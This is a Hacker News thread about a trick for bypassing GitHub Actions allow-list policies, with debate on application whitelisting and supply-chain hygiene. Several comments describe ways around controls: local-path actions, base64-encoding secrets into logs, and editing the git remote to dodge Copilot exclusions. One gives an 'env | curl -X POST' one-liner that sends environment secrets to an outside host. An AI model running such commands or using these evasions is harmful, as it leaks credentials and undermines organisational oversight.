Bypassing GitHub Actions policies in the dumbest way possible

193 woodruffw 93 6/11/2025, 2:15:54 PM blog.yossarian.net ↗

Comments (93)

kj4ips · 19h ago
This is a prime example of "If you make an unusable secure system, the users will turn it into an insecure usable one."

If someone is actively subverting a control like this, it probably means that the control has morphed from a guardrail into a log across the tracks.

Somewhat in the same vein as AppLocker &co. Almost everyone says you should be using it, but almost no-one does, because it takes a massive amount of effort just to understand what "acceptable software" is across your entire org.

welshwelsh · 13h ago
Nobody outside of the IT security bubble thinks that using AppLocker is a sensible idea.

Companies have no business telling their employees which specific programs they can and cannot run to do their jobs, that's an absurd level of micromanagement.

neilv · 12h ago
> Companies have no business telling their employees which specific programs they can and cannot run to do their jobs, that's an absurd level of micromanagement.

I'm usually on the side of empowering workers, but I believe sometimes the companies do have business saying this.

One reason is that much of the software industry has become a batpoop-insane slimefest of privacy (IP) invasion, as well as grossly negligent security.

Another reason is that the company may be held liable for license terms of the software.

Another reason is that the company may be held liable for illegal behavior of the software (e.g., if the software violates some IP of another party).

Every piece of software might expose the company to these risks. And maybe disproportionately so, if software is being introduced by the "I'm gettin' it done!" employee, rather than by someone who sees vetting for the risks as part of their job.

janstice · 7h ago
For example, if someone installs the wrong version of Oracle Java on a VM in our farm, the licencing cost is seven figures as they want to charge per core that it could conceivably run on - this would be career-limiting for a number of people at once.
lelandbatey · 12h ago
Developers are going to write code to do things for them, such as small utility programs for automating work. Each custom program is a potentially brand new binary, never sent before by the security auditing software. Does every program written by every dev have to be cleared? Is it best in such a system to get an interpreter cleared so I can use that to run whatever scripts I need?
degamad · 10h ago
If I have an internal developer in such a scenario, then what makes most sense to me is to issue them a code-signing certificate or equivalent, and whitelisting anything signed by that certificate[1], combined with logging and periodic auditing to detect abuse.

[1] <https://learn.microsoft.com/en-us/windows/security/applicati...>

xmprt · 12h ago
This is a strawman argument. If a developer writes code that does something malicious then it's on the developer. If they install a program then the accountability is a bit fuzzier. It's partly on the developer, partly on security (for allowing an unprivileged user to do malicious/dangerous things even unknowingly), and partly on IT (for allowing the unauthorized program to run without any verification).
lelandbatey · 10h ago
It's not a straw man, I'm not trying to defuse liability. Of course a developer running malicious code they wrote is responsible for the outcomes.

I am pointing out that if every unique binary never before run/approved is blocked, then no developer will be able to build and then run the software they are paid to write, since them developing it modifies said software into a new and never before seen sequence of bits.

OP may not have meant to say that "it's good to have an absolute allowlist of executable signatures and block everything else", but that is how I interpreted the initial claim and I am merely pointing out that such a system would be more than inconvenient, it'd make the workflow of editing and then running software nearly impossible.

rainonmoon · 3h ago
It's a straw man in that you're establishing an inherently facile and ridiculous scenario just to knock it down. A scenario that, as others have demonstrated, is not grounded in any logical reality. "Nobody mentioned this imaginary horrible system I just thought of, but if they had, it sure would be terrible" is quite a hill to die on.
viraptor · 10h ago
> Does every program written by every dev have to be cleared?

No, that's not how things are implemented normally, exactly because they wouldn't work.

gabeio · 10h ago
> No, that's not how things are implemented normally, exactly because they wouldn't work.

I used to work for a gov't contractor. I wrote a ~10 line golang http server, just because at the time golang was still new (this was years ago) and I wanted to try it. Not even 2 minutes later I got a call from the IT team asking a bunch of questions about why I was running that program (the http server not golang). I agree the practice is dumb but there are definitely companies who have it setup that way.

viraptor · 9h ago
So running it wasn't prevented for you, and new apps listening on the network trigger notifications that the IT checks on immediately. That sounds like a reasonable policy.
macintux · 9h ago
Around 1998 I snagged an abandoned 486 and installed Linux on it for use at work; the corporate software I used the most, a ticketing system, could be run using X from a Solaris server. I don't remember what I did for Lotus Notes.

Anyway, the IT department spotted it but since I was using SMB it thought it was just another Windows server. No one ever checked up on it despite being plugged into the corporate network.

This was a Fortune 500 company; things have changed a wee bit since then.

shanipribadi · 7h ago
had something similar happened a few years back.. basically the go binaries i compiled and run would get deleted every time I try to run it. usually just downloading the newer version of go compiler and recompile with that solves it (I think it got flagged because it was compiled with an older version of go compiler with known vulnerabilities). Every time it happened I think IT security got a notification, cos they would reach out to me afterwards. The few times upgrading to the latest go version didn't work (false positives), I would just name the binary something like "Dude, wake up", or "dude, I need this to get whitelisted", and do the compile-run-binary_got_deleted cycle 10-20 times, effectively paging the IT security guy until they reached out to me and whitelist things for me :-D.
zmgsabst · 6h ago
Developers are generally given specific environments to run code, which aren’t their laptops — eg, VMs in a development environment.

The goal isn’t to stop a developer from doing something malicious, but to add a step to the chain for hackers to do something malicious: they need to pwn the developer laptop from the devbox before they can pivot to, eg, internal data systems.

nradov · 12h ago
That level of micromanagement can be quite sensible depending on the employee role. It's not needed for developers doing generic software work without any sensitive data. But if the employee is, let's say, a nurse doing medical chart review at an insurance company then there is absolutely no need for them to use anything other than specific approved programs. Allowing use of random software greatly increases the potential attack surface area, and in the worst case could result in something like a malware penetration and/or HIPAA privacy violation.
moooo99 · 2h ago
> Companies have no business telling their employees which specific programs they can and cannot run to do their jobs, that's an absurd level of micromanagement.

This is a lovely take if your business exclusively running on FOSS on premise software, but is a receipe for some hefty bills from software vendors due to people violating licensing conditions

bigfatkitten · 11h ago
Anyone who’s been sued by Oracle for not paying for Java SE runtime licences thinks it’s an outstanding idea.

https://itwire.com/guest-articles/guest-opinion/is-an-oracle...

Security practitioners are big fans of application whitelisting for a reason: Your malware problems pretty much go away if malware cannot execute in the first place.

The Australian Signals Directorate for example has recommended (and more recently, mandated) application whitelisting on government systems for the past 15 years or so, because it would’ve prevented the majority of intrusions they’ve investigated.

https://nsarchive.gwu.edu/sites/default/files/documents/5014...

viraptor · 10h ago
AppLocker is effectively an almost perfect solution to ransomware. (On the employee desktops anyway) You can plug lots of random holes all day long or just whitelist what can be run in the first place. Ask M&S management today if they prefer to keep working with paper systems for the another month, or would they prefer to deal with AppLocker.
protocolture · 9h ago
>Companies have no business telling their employees which specific programs they can and cannot run to do their jobs, that's an absurd level of micromanagement.

Yet so many receptionists think that the application attached to the email sent by couriercompany@hotmail.com is a reasonable piece of software to run. Curious.

samplatt · 5h ago
False dichotomy. The manager of the receptionist, or the head of their department, can decide what's appropriate for their job and dictate this to IT, and then they can lock it down.

At my work currently IT have the first say and final say on all software, regardless of what it does or who is using it. It's an insane situation. Decisions are being made without any input from anyone even in the department of the users using the software... you know... the ones that actually make the company money...

davkan · 3h ago
No, it’s unreasonable for end users and non technical managers to simply dictate to IT what software is to be installed on corporate devices. They can submit requests to IT with a business justification which should be approved if can be accommodated.

Maybe your employer’s IT department is in the habit of saying no without a proper attempt to accommodate which can be a problem but, the solution is not to put the monkeys in charge of the zoo.

At my old job we had upper management demanding exceptions to office modern auth so they could use their preferred email apps. We denied that, there was no valid business justification that outweighed the security risk of bypassing MFA.

We then allowed a single exception to the policy for one of our devs as they were having issues with Outlook’s plaintext support when submitting patches to the LKML. Clear and obvious business justification without an alternative gets rubber stamped.

Security is a balance that can go too far in either direction. Your workstations probably don’t need to be air gapped, and susan from marketing probably shouldn’t be able to install grammarly.

solumos · 19h ago
The implied fix to the “unusable secure system” is forking the checkout action to your org and referencing it there.
hiatus · 18h ago
That's not a fix though is it? Git tools are already on the runner. You could checkout code from public repos using cli, and you could hardcode a token into the workflow if you wanted to access a private repo (assuming the malicious internal user doesn't have admin privileges to add a secret).
monster_truck · 18h ago
Had these exact same thoughts while I was configuring a series of workflows and scripts to get around the multiple unjustified and longstanding restrictions on what things are allowed to happen when.

That sinking feeling when you search for how to do something and all of the top results are issues that were opened over a decade ago...

It is especially painful trying to use github to do anything useful at all after being spoiled by working exclusively from a locally hosted gitlab instance. I gave up on trying to get things to cache correctly after a few attempts of following their documentation, it's not like I'm paying for it.

Was also very surprised to see that the recommended/suggested default configuration that runs CodeQL had burned over 2600 minutes of actions in just a day of light use, nearly doubling the total I had from weeks of sustained heavy utilization. Who's paying for that??

saghm · 14h ago
It used 1.8 days of time to run for a single day? I'm less curious about who's paying for it than who's _using _ it on your repo, because I can't even imagine having an average of almost two people scanning a codebase every single minute of the day.
heelix · 12h ago
Not the OP, but a poorly behaving repo can turn and burn for six hours on every PR, rather than the handful of minutes one would expect. It happens - but usually that sort of thing should be spotted and fixed. More often then not, something is trying to pull artifacts and timing out rather than it being a giant monorepo.
Already__Taken · 14h ago
I'm baffled you can't clone internal/private repos with anything other than a developer PAT. They have a UI to share access for workflows, let cloning use that...
notpushkin · 6h ago
SSH also works, but I’d love to be able to just use git-credential-oauth [0] like for any other repo.

[0]: https://github.com/hickford/git-credential-oauth

throwaway52176 · 13h ago
I use GitHub apps for this, it’s cumbersome but works.
TheTaytay · 18h ago
I don’t understand the risk honestly.

Anyone who can write code to the repo can already do anything in GitHub actions. This security measure was never designed to mitigate against a developer doing something malicious. Whether they clone another action into the repo or write custom scripts themselves, I don’t see how GitHub’s measures could protect against that.

woodruffw · 18h ago
A mitigation for this exact policy mechanism is included in the post.

(The point is not directly malicious introductions: it's supply chain risk in the form of engineers introducing actions/reusable workflows that are themselves malleable/mutable/subject to risk. A policy that claims to do that should in fact do it, or explicitly document its limitations.)

hk1337 · 14h ago
I haven't tested this but the main risk that is possible is users creating PRs on public repositories with actions that run on pull request.
SchemaLoad · 9h ago
Companies that care about this kind of thing usually have the CI config on another repo from the actual code so you can't just rewrite it to deploy your dev branch straight to prod.
SamuelAdams · 11h ago
The risk is simple enough. GitHub Enterprise allows admins to configure a list of actions to allow or deny. Ideally these actions are published in the GitHub Marketplace.

The idea is that the organization does not trust these third-parties, therefore they disable their access.

However this solution bypasses those lists by cloning open-source actions directly into the runner. At that point it’s just running code, no different from if the maintainers wrote a complex action themselves.

x0x0 · 14h ago
The risk is the same reason we don't allow any of our servers to make outgoing network connections except to a limited host lists. eg backend servers can talk to the gateway, queue / databases, and an approved list of domains for apis and nothing else.

The same guard helps prevent accidents, not maliciousness, and security breaches. If code somehow gets onto our systems, but we prevent most outbound connections, exfiltrating is much harder.

Yes, people do code review but stuff slips through. See eg Google switching one of their core libs that did mkdir with a shell to run mkdir -p (tada! every invocation better understand shell escaping rules). That made it through code review. People are imperfect; telling your network no outbound connections (except for this small list) is much closer to perfect.

paulddraper · 7h ago
Well…you’re right.

The dumb thing is GitHub offers “action policies” pretending they actually do something.

hk1337 · 18h ago
This is why I avoid using non-official actions where possible and always set a version for the action.

We had a contractor that used some random action to ssh files to the server and referenced master as the version to boot. First, ssh isn't that difficult to upload files and run commands but the action owner could easily add code to save private keys and information to another server.

I am a bit confused on the "bypass" though. Wouldn't the adversary need push access to the repository to edit the workflow file? So, the portion that needs hardening is ensuring the wrong people do not have access to push files to the repository?

On public repositories I could see this being an issue if they do it in a section of the workflow that is run when a PR is created. Private repositories, you should take care with who you give access.

gawa · 15h ago
> This is why I avoid using non-official actions where possible and always set a version for the action.

Those are good practices. I would add that pinning the version (tag) is not enough, as we learnt with the tj-actions/changed-files event. We should pin the commit sha.[0]. Github states this in their official documentation [1] as well:

> Pin actions to a full length commit SHA

> Pin actions to a tag only if you trust the creator

[0] https://www.stepsecurity.io/blog/harden-runner-detection-tj-...

[1] https://docs.github.com/en/actions/security-for-github-actio...

jand · 13h ago
> I am a bit confused on the "bypass" though. Wouldn't the adversary need push access to the repository to edit the workflow file? So, the portion that needs hardening is ensuring the wrong people do not have access to push files to the repository?

I understand it that way, too. But: Having company-wide policies in place (regarding actions) might be misunderstood/used as a security measure for the company against malicious/sloppy developers.

So documenting or highlighting the behaviour helps the devops guys avoid a wrong sense of security. Not much more.

OptionOfT · 14h ago
We forked the actions as a submodule, and then pointed the uses to that directory.

That way we were still tracking the individual commits which we approved as a team.

Now there is interesting dichotomy. On one hand PMs want us to leverage GitHub Actions to build out stuff more quickly using pre-built blocks, but on the other hand security has no capacity or interest to whitelist actions (not to mention that the whitelist list is limited to 100 actions as per the article).

That said, even tagging GitHub actions with a sha256 isn't perfect for container actions as they can refer to a tag, and the contents of that tag can be changed: https://docs.github.com/en/actions/sharing-automations/creat...

E.g. I publish an action with code like

   runs:
     using: 'docker'
     image: 'docker://optionoft/actions-tool:v3.0.0'
You use the action, and pin it to the SHA of this commit.

I get hacked, and a hacker publishes a new version of optionoft/actions-tool:v3.0.0

You wouldn't even get a Dependabot update PR.

opello · 13h ago
Maybe there's a future Dependabot feature to create FYI issues when in use tags change?
wereHamster · 11h ago
securityscorecard is easy to integrate (it's a cli tool or you run it as a github action), one of the checks it performs is "Pinned-Dependencies": https://github.com/ossf/scorecard/blob/main/docs/checks.md#p.... Checks that fail generate an security alert under Security -> Code scanning.
fkyoureadthedoc · 18h ago
This doesn't seem like a big deal to be honest.

My main problem with the policy and how it's implemented at my job is that the ones setting the policies aren't the ones impacted by them, and never consult people who are. Our security team tells our GitHub admin team that we can't use 3rd party actions.

Our GitHub admin team says sure, sounds good. They don't care, because they don't use actions, and they in fact don't delivery anything at all. Security team also delivers nothing, so they don't care. Combined, these teams crowning achievement is buying GitHub Enterprise and moving it back and forth between cloud and on prem 3 times in the last 7 years.

As a developer, I'll read the action I want to use, and if it looks good I just clone the code and upload it into our own org/repo. I'm already executing a million npm modules in the same context that do god knows what. If anyone complains, it's getting hit by the same static/dynamic analysis tools as the rest of the code and dependencies.

mook · 17h ago
It sounds like reading the code and forking it (therefore preventing malicious updates) totally satisfies the intent behind the policy, then.

My company has a similar whitelist of actions, with a list of third-party actions that were evaluated and rejected. A lot of the rejected stuff seems to be some sort of helper to make a release, which pretty much has a blanket suggestion to use the `gh` CLI already on the runners.

bob1029 · 18h ago
I feel like GitHub's CI/CD offering is too "all-in" now. Once we are at a point where the SCM tool is a superset of AWS circa 2010, we probably need to step back and consider alternatives.

A more ideal approach could be to expose a simple rest API or webhook that allows for the repo owner to integrate external tooling that is better suited for the purpose of enforcing status checks.

I would much rather write CI/CD tooling in something like python or C# than screw around with yaml files and weird shared libraries of actions. You can achieve something approximating this right now, but you would have to do it by way of GH Actions to some extent.

PRs are hardly latency sensitive, so polling a REST API once every 60 seconds seems acceptable to me. This is essentially what we used to do with Jenkins, except we'd just poll the repo head instead of some weird API.

masklinn · 14h ago
> A more ideal approach could be to expose a simple rest API or webhook that allows for the repo owner to integrate external tooling that is better suited for the purpose of enforcing status checks.

That... has existed for years? https://docs.github.com/en/rest?apiVersion=2022-11-28

That was the only thing available before github actions. That was also the only thing available if you wanted to implement the not rocket science principle before merge queues.

It's hard to beat free tho, especially for OSS maintainership.

And GHA gives you concurrency you'd have to maintain an orchestrator (or a completely bespoke solution), just create multiple jobs or workflow.

And you don't need to deal with tokens to send statuses with. And you get all the logs and feedback in the git interface rather than having to BYO again. And you can actually have PRs marked as merged when you rebased or squashed them (a feature request which is now in middle school: https://github.com/isaacs/github/issues/2)

> PRs are hardly latency sensitive, so polling a REST API once every 60 seconds seems acceptable to me.

There is nothing to poll: https://docs.github.com/en/webhooks/types-of-webhooks

korm · 17h ago
GitHub has both webhooks and an extensive API. What you are describing is entirely doable, nothing really requires GitHub Actions as far as I know.

Most people opt for it for convenience. There's a balance you can strike between all the yaml and shared actions, and running your own scripts.

sureglymop · 12h ago
I don't understand GitHubs popularity in the first place... You have git as the interoperable version control "protocol" but then slap proprietary issue, PR, CI and project management features on top that one couldn't bring with when migrating away? At that stage what is even the point of it being built on git? Also, for all that is great about git, I don't think it's the best version control system we could have at all. I wish we'd do some serious wheel reinventing here.
bob1029 · 10h ago
What do you think a more ideal VCS would look like?
clysm · 18h ago
I’m not seeing the security issue here. Arbitrary code execution leads to arbitrary code execution?

Seems like policies are impossible to enforce in general on what can be executed, so the only recourse is to limit secret access.

Is there a demonstration of this being able to access/steal secrets of some sort?

mystifyingpoi · 16h ago
> Seems like policies are impossible to enforce

The author relates to exactly that: "ineffective policy mechanisms are worse than missing policy mechanisms, because they provide all of the feeling of security through compliance while actually incentivizing malicious forms of compliance."

And I totally agree. It is so abundant. "Yes, we are in compliance with all the strong password requirements, strictly speaking there is one strong password for every single admin user for all services we use, but that's not in the checklist, right?"

dijksterhuis · 16h ago
It's less of an "use this to do nasty shit to a bunch of unsuspecting victims" one, and more of a "people can get around your policies when you actually need policies that limit your users".

1. BigEnterpriseOrg central IT dept click the tick boxes to disable outside actions because <INSERT SECURITY FRAMEWORK> compliance requires not using external actions [0]

2. BigBrainedDeveloper wants to use ExternalAction, so uses the method documented in the post because they have a big brain

3. BigEnterpriseOrg is no longer compliant with <INSERT SECURITY FRAMEWORK> and, more importantly, the central IT dept have zero idea this is happening without continuously inspecting all the CI workflows for every team they support and signing off on all code changes [1]

That's why someone else's point of "you're supposed to fork the action into your organisation" is a solution if disabling local `uses:` is added as an option in the tick boxes -- the central IT dept have visibility over what's being used and by whom if BigBrainedDeveloper can ask for ExternalAction to be forked into BigEnterpriseOrg GH organisation. Central IT dept's involvement is now just review the codebase, fork it, maintain updates.

NOTE: This is not a panacea against all things that go against <INSERT SECURITY FRAMEWORK> compliance (downloading external binaries etc). But it would be an easy gap getting closed.

----

[0]: or something, i dunno, plenty of reasons enterprise IT depts do stuff that frustrates internal developers

[1]: A sure-fire way to piss off every single one of your internal developers.

hiatus · 19h ago
That the policy can be "bypassed" by a code change doesn't seem so severe. If you are not reviewing changes to your CI/CD workflows all hope is lost. Your code could be exfiltrated, secrets stolen, and more.
woodruffw · 19h ago
The point of the post is that review is varied in practice: if you’re a large organization you should be reviewing the code itself for changes, but I suspect many orgs aren’t tracking every action (and every version of every action) introduced in CI/CD changes. That’s what policies are useful for, and why bypasses are potentially dangerous.

Or as an intuitive framing: if you can understand the value of branch protection and secret pushing policies for helping your junior engineers, the same holds for your CI/CD policies.

hiatus · 18h ago
The problem is not related to tracking every action or version in CI/CD changes. Right now, you can just curl a binary and run that. How is that any different from the exploit here? I guess people may have had a false sense of security if they had implemented those policies, but I would posit those people didn't really understand their CI/CD system if they thought those policies alone would prevent arbitrary code execution.
woodruffw · 18h ago
I think it's a difference in category; pulling random binaries from the Internet is obviously not good, but it's empirically mostly done in a pointwise manner. Actions on the other hand are pulled from a "marketplace", are subject to automatic bumps via things like Dependanbot and Renovate, can be silently rewritten thanks to tag mutability, etc.

Clearly in an ideal world runners would be hermetic. But I think the presence of other sources of non-hermeticity doesn't justify a poorly implemented policy feature on GitHub's part.

solumos · 19h ago
“We only allow actions published by our organization and reusable workflows”

and

“We only allow actions published by our organization and reusable workflows OR ones that are manually downloaded from an outside source”

are very very different policies

hiatus · 18h ago
But there is no policy preventing external downloads in general, is there? I can curl a random script from a malicious website, too.
internobody · 19h ago
It's not simply a matter of review; depending on your setup these bypasses could be run before anyone even has eyes on the changes if your CI is triggered on push or on PR creation.
jadamson · 18h ago
`pull_request_target` (which has access to secrets) runs in the context of the destination branch, so any malicious workflow would need to have already been committed.

GitHub has a page on this:

https://securitylab.github.com/resources/github-actions-prev...

rawling · 18h ago
But similarly, couldn't you just write harmful stuff straight into the action itself?
mystifyingpoi · 16h ago
You definitely could, but it is more nuanced than that. You really don't want to be seen doing `env | curl -X POST http://myserver.cn` in a company repository. But using a legitly named action doesn't look too suspicious.
throwaway889900 · 19h ago
Not only can you yourself manually check out a specific repo, but if you have submodules and do a recursive checkout, it's also possible to pull in other security nightmares from places you never expected now. That would be one complicated attack to pull off though, chain of compromised workflows haha
ghusto · 19h ago
> world’s dumbest policy bypass: instead of doing uses: actions/checkout@v4, the user can git clone (or otherwise fetch) the actions/checkout repository into the runner’s filesystem, and then use uses: ./path/to/checkout to run the very same action

Good lord.

This is akin to saying "Instead of doing `apt-get install <PACKAGE>`, one can bypass the apt policies by downloading the package and running `dpkg -i <PACKAGE>`.

woodruffw · 18h ago
I think a salient difference is that apt policies apply to apt, which GitHub goes to extents to document GitHub Actions policies as applying to `uses:` clauses writ large.

(But also: in a structural sense, if a system did have `apt` policies that were intended to prevent dependency introduction, then such a system should prevent that kind of bypass. That doesn't mean that the bypass is life-or-death, but it's a matter of hygiene and misuse prevention.)

gawa · 16h ago
> which GitHub goes to extents to document GitHub Actions policies as applying to `uses:` clauses

If it were phrased like this then you would be right. The docs would give a false sense of security, would be misleading. So I went to check, but I didn't find such assertion in the linked docs (please let me know if I missed it) [0]

So I agree with the commenter above (and Github) that "editing the github action to add steps to download a script and running" is not a fundamental flaw of this system designed to do exactly that, to run commands as instructed by the user.

Overall we should always ask ourselves: what's the threat model here? If anyone can edit the Github Action, then we can make it do a lot of things, and this "Github Action Policy" filter toggle is the last of our worry. The only way to make the CI/CD pipeline secure (especially since the CD part usually have access to the outside world) is to prevent people from editing and running anything they want in it. It means preventing the access of users to the repository itself in the case off Github Actions.

[0] https://blog.yossarian.net/2025/06/11/github-actions-policie...

woodruffw · 15h ago
That's from here[1].

I suppose there's room for interpretation here, but I think an intuitive scan of "Allowing select actions and reusable workflows to run" is that the contrapositive ("not allowed actions and reusable workflows will not run") also holds. The trick in the post violates that contrapositive.

I think people are really getting caught up on the code execution part of this, which is not really the point. The point is that a policy needs to be encompassing to have its intended effect, which in the case of GitHub Actions is presumably to allow large organizations/companies to inventory their CI/CD dependencies and make globally consistent, auditable decisions about them.

Or in other words: the point here is similar to the reason companies run their own private NPM, PyPI, etc. indices -- the point is not to stop the junior engineers from inserting shoddy dependencies, but to know when they do so that remediation becomes a matter of policy, not "find everywhere we depend on this component." Bypassing that policy means that the worst of both worlds happens: you have the shoddy dependency and the policy-view of the world doesn't believe you do.

[1]: https://docs.github.com/en/repositories/managing-your-reposi...

qbane · 18h ago
Also you can leak any secrets by making connections to external services via internet and simply send secrets to them.
mystifyingpoi · 16h ago
You can also print them to console in quadruple base64 in reverse, the trick is getting away with it.
formerly_proven · 17h ago
Not in many enterprisey CI systems you can't, those frequently have hermetic build environments.
msgodel · 16h ago
Nothing makes me want to quit software more than enterprisey CI systems.
qbane · 16h ago
I think GitHub is correct that the bypass itself is not a vulnerability, but just like the little tooltip on GitHub's "create secret gist" button, GitHub can do a better job clarifying at the "Actions permissions" section.
john-h-k · 13h ago
There is no meaningful way to get around this. Ban them in `uses:` keys? Fine, they just put it in a bash script and run that. Etc etc. If it allows running arbitrary code, this will always exist
0xbadcafebee · 12h ago
You call it a security issue. I call it my only recourse when the god damn tyrannical GitHub Org admins lock it down so hard I can't do my job.

(yes it is a security issue (as it defeats a security policy) but I hope it remains unfixed because it's a stupid policy)

chelmzy · 17h ago
Does anyone know how to query what actions have been imported from the Actions Marketplace (or anywhere) in Github enterprise? I've been lazily looking into this for a bit and can't find a straight answer.
jamesblonde · 12h ago
Run data integration pipelines with Github actions -

https://dlthub.com/docs/walkthroughs/deploy-a-pipeline/deplo...

It's the easiest way for many startups to get people to try out your software for free.

solatic · 15h ago
If your Security folk are trying to draw up a wall around the enterprise (prevent using stuff not intentionally mirrored in) but there are no network controls - no IP address based firewalls, no DNS firewalls, no Layer 7 firewalls (like AWS VPC Endpoint Policy or GCP VPC Service Controls) governing access to object storage and the like.... Quite frankly, the implementation is either immature or incompetent.

If you work for an org with restrictive policy but not restrictive network controls, anyone at work could stand up a $5 VPS and break the network control. Or a Raspberry Pi at home and DynDNS. Or a million others.

Don't be stupid and think that a single security control means you don't need to do defense in depth.

bluelightning2k · 10h ago
I don't think this is a security flaw.

That's like saying it's a security flaw in the Chrome store that you could enable dev mode, copy the malware and run it that way.

zingababba · 13h ago
Copilot repository exclusions is another funny control from GitHub. It gets the local repo context from the .git/config remote origin URL. Just comment that out and you can use copilot on an 'excluded' repo. Remove the comment to push your changes. Very much a paper control.
lmm · 19h ago
Meh. Arbitrary code execution allows you to execute arbitrary code. If you curl | sh something in your github action script then that will "bypass the policy" too.

No comments yet

gchamonlive · 13h ago
I'm inclined to add https://github.com/marketplace/actions/sync-to-gitlab to all my repos in github, so that I can tap into the social value of GitHub's community and the technical value of GitLab's everything else.
dijksterhuis · 9h ago
Simpler version from GitLab (no actions needed) https://docs.gitlab.com/user/project/repository/mirror/push/

I was planning to do this myself. GitLab for dev work proper. GitHub push mirror on `main` for gen-pop access (releases/user issue reporting).